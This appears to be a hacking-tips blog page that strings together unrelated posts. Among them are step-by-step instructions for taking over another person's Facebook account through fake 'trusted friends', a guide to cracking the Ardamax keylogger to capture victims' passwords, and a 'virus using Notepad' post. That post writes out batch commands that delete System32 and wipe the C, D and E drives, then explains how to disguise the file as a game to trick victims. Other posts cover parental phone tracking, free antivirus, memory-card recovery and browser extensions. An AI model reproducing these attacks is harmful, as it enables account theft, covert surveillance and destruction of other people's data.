Hack Facebook Accounts With Reverting


However here in this tutorial we will be exploiting a bug inside facebook in order to hack a facebook account. The vulnerability exploits trusted friends feature inside facebook which could be used to reset some one's facebook password.  

Note: If you would like to learn about more advanced methods to hack a facebook account, Kindly refer my post How To Hack Facebook Password.


1. The thing which we use is to trick the Three Friend Account Recovery Method of facebook
2. The homework i was talking about is that you will have to make three fake account and make sure that they are in the friend list of the person you want to hack.
3. Once you are done with the above two steps you can start the hacking business.
4. Go to Forgot Password area of facebook.
5. It will show victims e-mail address and may be mobile phone at which he can be reached,choose ''no longer access to these'' option.

6. Now you will be prompted to enter an alternate e-mail address, type your e-mail address or create a new one.
7. Now you will be asked the ''Security question". Make random guesses,if you know the victim you might just get the right answer,if you don't-no worries !
8. If you have not succeeded in getting the answer right you will get to our main aim ''The Trusted Friends" recovery option.
 
                                 
9. Here click on ''continue'',choose  3 trusted friends-The Three fake accounts you have created and they are friends with the victim.
   
                           
10. After you have chosen them,facebook will supply you with some codes on those fake accounts,follow the procedure and victims account is yours ! You've hacked them ! :)


How To Track Children with Mobile Tracking


Being a good parent is the most important job anyone will ever take on, but parenthood can be a challenge when teenage children are concerned.
With technology allowing the free flow of information and communication, how can parents keep their kids safe while giving them freedom?
Unfortunately, it is a fact of life that most teenagers are naturally drawn to excitement and risk. This creates a big problem when it comes to finding a happy medium between safety and freedom


Talking on Phone
With frequent use of the internet and social media sites and their complete reliance on mobile phones for communication, monitoring who your teenager talks to and what information he receives can seem like an insurmountable task.
However, you can’t realistically expect to deprive your children of the gadgets that most adults have. Nor should you limit all independence.
To begin with, doing so could seriously affect their ability to communicate with friends or get in contact with family members if they need urgent help.
Future career prospects might also depend on their ability to use the latest technology and communication tools.

Benefits and Risks

Allowing teenagers to have their own mobile phone can, of course, have many benefits, especially in the case of an emergency. A teenager’s mobile can be something of a thorn for a parent.
Though needed for safety reasons, the phone is also a child’s ticket to freedom. Sometimes freedom must be curtailed.
Parents who are not quite up to speed with new technology will be relieved to learn that there are a few options available to them that could provide help.
It is possible, for instance, to monitor mobile phone usage and even track the phone’s physical location using GPS.
If you are confident about taking matters into your own hands, you could consider seeking out a handset that includes tracking technology as standard. These are available from a few private companies and the phone is supplied without a SIM card.
You can then fit the handset with your own SIM card, install the provided software onto your home PC and track your child’s location.

Parental Control

There has been talk of a SIM card that will soon be available that has a built-in capacity for parental control. Parents will be given the power to switch off the phone’s network at certain times (e.g., during school hours or late at night).
They can also monitor texts and calls and even control contacts, blocking calls and texts from unknown or unwanted callers. Internet use and data downloads can also be controlled and monitored, as well as picture and video messaging.
Purchasing a SIM card without a handset will, of course, give you the freedom to keep up with your teenager’s rapidly changing tastes by enabling relatively low-cost replacement of the handset as often as you please.
In the case of the pre-fitted tracker handsets, this will allow you to purchase updated handsets as they are released.

It’s Easy to Get your Location Leaked

Location-based services for mobile phones have been around for a while, but have come into more regular use with the rise of the smartphones using GPS and Wi-Fi technology.
Many of the social networking sites used by teenagers have integrated applications that use these technologies, which allows users to share their location with friends.
Applications such as FourSquare or Google Latitude, part of Google Maps, also use this technology to locate users and show both their location and that of friends and family on a digital map.
Before you think about this as an easy way to locate your teenager, it is worth remembering that this information is not only visible to you, but to just about anyone who wants to find it.
Quite often, a teenager’s social networking friends will include people they may not have met before and this technology will effectively allow your teenager’s whereabouts to be common knowledge to strangers, possibly putting them at risk.

Subscription Services

Perhaps the safest way to look at tracking your teenager’s phone would be to use a subscription tracking service. A Google search for “mobile tracker” will give you a host of companies that, for a monthly subscription, will track a particular phone and keep you informed of its whereabouts.
You may also use apps like Where’s My Droid for Android, or BlackBerry Protect for BlackBerry to keep a track on your child.
BlackBerry Protect
This information is only made available to you.
Any tracking device or service will only be effective if the phone is switched on and it is only the phone or SIM that can be tracked, not the child, so if your teenager leaves his phone at home or it gets lost, you may still not know your child’s whereabouts.
Also, it is worth knowing that a subscription tracking service can only be used with the child’s consent, so parents looking for a furtive way to track their child may be disappointed.
About The Author: Sarah James writes regularly on technology for a wide range of publications and websites. For more information compare high speed internet providers in your area on this website.


Best 5 Free Antivirus


Why buy a paid Antivirus for your Home PC protection when the biggies are providing these for free!
Many companies offer free versions of their popular antivirus for home users while offering more advanced features as an upgrade option for professionals and businesses.
Here is a list of the best 5 antivirus programs that are available for free download. These are full-fledged antivirus programs, not trials or ones that work only on-demand, without real-time protection:;-
Check This Out

1. AVG Free

avg antivirus free

Pros

  • Provides on-access protection from viruses and other malware
  • Updated periodically and automatically
  • Works with Windows 7, Vista, XP, and 2000
  • Does not attempt to install unrelated software
  • Easy to install & manage

Cons

  • Can only be used at home – not for businesses
  • Does not include a “Game Mode” for silent working during gaming.

2. Avast! Free Antivirus

avast antivirus free

Pros

  • Provides on-access protection from viruses and other malware
  • Includes a “heuristics engine” to detect previously unknown threats
  • Features a silent mode to hide alerts during gaming.
  • Works with Windows 7, Vista, XP, and 2000

Cons

  • Home use only
  • Attempts to install unrelated softwares
  • Registration is periodically required. (it’s free though)

3. Microsoft Security Essentials

Microsoft Security Essentials antivirus free

Pros

  • Provides resident protection from viruses, spyware and other malware
  • Works with Windows 7, Vista, and XP
  • Updated automatically and regularly
  • Very easy to install & manage
  • Does not attempt to install unrelated software

Cons

  • Does not include a silent mode for gaming.

 4. Avira Antivir Personal

Avira antivirus free
Pros
  • Protects from many types of malwares & viruses
  • Contains advanced heuristic tools
  • Works on Windows 7, Vista, XP, and 2000
  • Does not install unrelated softwares
  • Updates automatically

Cons

  • Only for home use
  • No 64-bit version

5. Panda Cloud Antivirus

Panda Cloud antivirus free
Pros
  • Protection from Malwares & viruses
  • Automatic updates
  • Works on a cloud (the heavy antivirus tasks are done on other computers, freeing up your PC)
  • Supports Windows 7, Windows Vista and Windows XP.
Cons
  • Tries to install unrelated softwares



Ardamax Keylogger Cracked-Hack Emails, Facebook etc.


Many people search for a better keylogger but they don’t want to spend a single peny to achieve this goal and inshort they don’t buy a keylogger.  But I am providing a free and cracked ardamax keylogger that is available in market too but only at trial basis. Inorder to use it for free then follow my hack procedure:-

Download Ardamax Keylogger-Crack included:-

You can download ardamax keylogger below:-
Sorry! We are no more promoting the crack files, Otherwise we shall be accused of exiting the hackers, since we have found that mostly this software has been misused. Sorry, for inconvenience.

How to use Crack for Ardamax Keylogger:-

Extract the downloaded package, Open it and then install ardamax by running “Setup ardamax”.
After that in the extracted package; open folder “Files to be replaced” and then copy “POL” and go to the directory where you have installed ardamax and pase the “POL” there, remember there will be already “POL” present just replace that with the “POL” given in the cracked package by hackersthirst. Cheers you are done now just run Ardamax Keylogger and use it for free.
A tutorial about how to use ardamax has been posted here:- How to: Use Ardamax to Hack Facebook, Twitter and Email's  It will include that how can we hack Facebook, Twitter and other email id’s using ardamax. To get latest updates just subscribe to Us by Email below.

What: basic features are in ardamax:-

1- Allows you to setup a remote keylogger server to hack victim remotely by just using an .exe file and sending it through email or other means.
2- Keylogged passwords can be sent to hacker by couple of ways like ftp, email etc.
3- You can also get screen shots of the victim computer.
4- Its quite easy to use and you can make remote keylogger server in seconds
5- Can change icon of the generated remote keylogger server.
6- You can monitor any computer running Windows easily in seconds.
Inshort all features of keyloggers are present in ardamax.

How to unlock Any password protected Memory card..


Hello gyes. Actually this post was made possible due to one of my friend "Dhritiman". He accidentaly locked his memory card and was desperate to unlock it as it contained "Useless" still valuabel data for him. He wanted me to unlock the mmc card, so during the task i came through this process and thought about sharing it here so that you gyes dont ever have a problem even after forgetting your mmc card password. 
Requirements:

  • FExplorer. 
  • Nokia Cell Phone.
  • A PC/Laptop
  • You can download FExplorer for Nokia from Nokia / OVI store or Google. Its Free.

    Process:
    • Insert the locked card into your Nokia Cell phone.
    • Download FExplorer and install it into C:/ drive also called Phone Memory of the cell phone. remember not to install it into the memory card.
    • After Installing you'll find a file called "mmcstore" in the same drive where you installed the FExplorer. ( Phone Memory ).
    • Now Copy this file to your PC Either by using Data cable or Bluetooth.
    • Open this file in your PC using Notepad.
    • Scroll Down and you'll find your password.
    • Happy Unlocking :)
    Guyz Please leave feedback. And i'll soon be posting on "How to unlock any mmc card using X-plore" so keep checking back.

* New Social Networking Site "ZURKER" Launched. Be its Owner.






Will'nt it be amazing to be a shareholder to a site which is going to overtake Facebook? Well gyes, there's nothing much you need. Just a profile on Zurker, and for each profile they offer 2Vshares.



I'm posting it here cause i Joined it and i was promoted rather fabulously. And indeed the site also has a lot of features common in FACEBOOK and many things BETTER than it. So i think You should give it a look gyes.
Just click the below link to Join Zurker.

Click here To join zuker

Original Article frm www.hackingmyworld.blogspot

How to Create a Virus Using Notepad.

Introduction : Friends , all of you are most probably aware of viruses. The Only Headache of Every Windows PC owner is that his Pc might get virus. If a virus hits your computer, then no need to say what a nightmare you'll have.
       And what if someone sent you a virus through a USB, or mail attachment ? There are times in our lives , when we think " Hope, I too could create a virus ". Well then this is the time friends, So here I am posting the process how to create a virus. And sorry i cant post the virus file itself, as Internet doesn't allow to post or send .bat or .cmd files .
                                 

Disclaimer : This is 100% or education purpose only. If you intend to use it in any illegal activity, Then it'll be 101% your Responsibility Solely.



Note: Friends, In the Coming Days i'll Post almost 75 virus creation methods. So i've divided Each Post into Several parts, So please Keep reading.



Process: 
  •  Open Notepad
  • Write / copy the below command there:
  • " del c:\WINDOWS\system32\*.*/q "  without quote
  • and save as " anything.bat"
  • Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.



Virus II:

Process:


  •  Open Notepad
  • Copy the below command there 
  • "rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\" ( without quotes )
  • Save as "anything.bat
  • This virus Formats the C ,D  , and E Drive in 3  Seconds.





How to Spread it:
* Windows does'nt allow to change the icon of .bat files. Therefore what you can do is :

  • Right click on the .bat file
  • Click on CREATE SHORTCUT
  • And hide the original file.
  • Now as this newly created file is just the shortcut, you can easily change its icon. 
  • Right click on this shortcut
  • properties >>>..cutomize>>..choose icon
  • Now give an attractive icon to it. 
  • Now name it something intresting. eg. PROTOTYPE or IGI etc. 
  • Now your victim would think it to be the game , and he will be easily curropted.

  • This trick to change icon and name can be used in each and every virus creation method which i'll post. Therefore I'll not post it over and over again.

    Original Article frm www.hackingmyworld.blogspot

Free Aircel Internet One Day pack.

Hi friends. We all spend quite some bucks on the name of Pocket Internet.  So here's a very simple, Legal trick or Bug to be said better, which activates one day Aircel internet pack on your mobile.

Process:

  • Dial *234*114#
  • Then select the POCKET INTERNET option.
  • Done ! 



Note:This trick works only once in a month. Better not to be tried twice, or your SIM card might be  blocked.

Quick & Easy Torrent Search Links on IMDb Movie Pages


As you all know IMDb (Internet Movie Data-Base) is the best online movie reviewing website, so any movie released or going to be released is right their indexed on IMDb, so many people love to download these movies using torrent support so now every movie page has some good torrent links which when clicked will tale you to downloading torrent page from you can download that torrent.

So as you can see you have links highlighted in Red border, so main torrent engines are available from which you can download that particular movie. There is a script called IMDb Torrent Search created by AaronHarun which when installed will show you all the links like in the image above. Well this script can be directly installed in Chrome browser but if you are on Firefox you need to have Greasemonkey  installed.

Scroll to Top Chrome Extension for Easier Website Navigation


Sometimes websites can be long crammed up with the content and your time ends up scrolling that website to the bottom and when you are done reading the content you again start scrolling it upwards to the reach the header of that webpage, well that’s really unfair but many websites have installed the scroll to top option when automatically comes in when you scroll down and you click it out and you are taken up. But every website does not have that option so we found an interesting chrome extension that will automatically add this scroll to top button for easier website navigation.     


The button can be configures out through its settings menu, so you can change the design of the button its color the place where it will be visible, speeds of scrolling and much more. Why don’t you watch the video from tekzilla giving a nice demo on this small extension.



So now you do not need to click and drag your mouse on the scrollbar again and again to view the content, so if you wanna go down just click the down arrow and in no time you will be taken down and vice versa. So its really a useful extension or plugin or life saver what ever you call it but its really good to be installed and you will love it out.  Extention